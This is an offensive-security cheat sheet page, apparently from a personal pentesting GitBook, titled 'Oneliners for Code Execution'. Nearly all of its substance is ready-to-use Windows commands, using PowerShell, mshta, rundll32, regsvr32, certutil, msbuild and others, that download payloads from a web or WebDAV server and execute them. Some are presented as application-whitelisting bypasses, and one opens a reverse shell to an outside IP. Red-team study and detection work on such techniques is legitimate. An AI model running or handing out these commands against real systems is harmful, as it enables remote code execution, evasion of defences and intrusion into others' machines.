Libertyunix
  • About.me
  • Getting Started
    • Kali Images
    • Setting Up Your Kali Box
  • CheetSheets
    • OSCP Fun
    • Active Directory
    • Windows
    • 802-11 Wireless
    • Enumeration
    • Payloads
    • Secure Copy Protocol
    • Privilege Escalation
    • Tunneling
    • Red Team Playbook
    • Oneliners for Code Execution
  • PenTesting & Red Teaming
    • Python for Exfil
    • Using MSBuild to Execute Shellcode in C#
    • Social Engineering Tricks
    • Setting Up Caldera & Atomic Red-Team
    • Discovering & Exploiting Buffer Overflows
  • Wireless
    • An Introduction to IoT Penetration Testing
    • An Introduction to BLE - Part 1
    • BLE Deep Dive
    • Proxmark 3
  • Hack The Box
    • Fuse
    • Blunder
    • Unblanced
    • Tabby
  • Threat Hunting
    • Threat Hunter Playbook
  • DFIR
    • Creating Windows USB for DFIR & Fun (DRAFT)
  • Talks, Workshops, & WriteUps
    • The Portable Executable (PE) (DRAFT)
    • Resume
    • Presented Research
    • Offensive Security 101 Workshop
Powered by GitBook
On this page

Last updated 4 years ago

PowerShell

But you can also call the payload directly from a WebDAV server:

Cmd

Check out the great work by Arno0x with Invoke-EmbedInBatch.ps1 script (heavily inspired by @xorrior work), and see that you can easily execute any binary, dll, script:

Cscript/Wscript

Mshta

As seen in the koadic framework mshta accepts a URL as an argument to execute an HTA file:

Rundll32

Wmic

Regasm/Regsvc

Application whitelisting bypass techniques discovered by @subTee. You need to create a specific DLL (can be written in .Net/C#) that will expose the proper interfaces, and you can then call it over WebDAV:

Regsvr32

Another one from @subTee. This ones requires a slightly different scriptlet from the mshta one above. First option:

Second option using UNC/WebDAV:

Odbcconf

To be noted is that the DLL file doesn’t need to have the .dll extension. It can be downloaded using UNC/WebDAV:

Msbuild

Certutil

Great work by @subTee for discovering this:

Now combining some commands in one line, with the InstallUtil.exe executing a specific DLL as a payload:

You could simply deliver an executable:

This information was referenced from:

cmd.exe /k < \\webdavserver\folder\batchfile.txt
cscript //E:jscript \\webdavserver\folder\payload.txt
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
mshta http://webserver/payload.hta
rundll32 \\webdavserver\folder\payload.dll,entrypoint
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:
http://webserver/payload.sct");window.close();
wmic os get /format:"https://webserver/payload.xsl"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u 
\\webdavserver\folder\payload.dll
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
certutil -urlcache -split -f http://webserver/payload payload
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
  • PowerShell
  • Cmd
  • Cscript/Wscript
  • Mshta
  • Rundll32
  • Wmic
  • Regasm/Regsvc
  • Regsvr32
  • Odbcconf
  • Msbuild
  • Certutil
PreviousTunnelingNextPython for Exfil
  1. CheetSheets

Oneliners for Code Execution

powershell.exe iex (iwr http://172.16.100.211/Invoke-PowerT.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.211 -Port 443
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
LogoPowerShellScripts/Invoke-EmbedInBatch.ps1 at master · Arno0x/PowerShellScriptsGitHub
LogoWindows oneliners to download remote payload and execute arbitrary codearno0x0x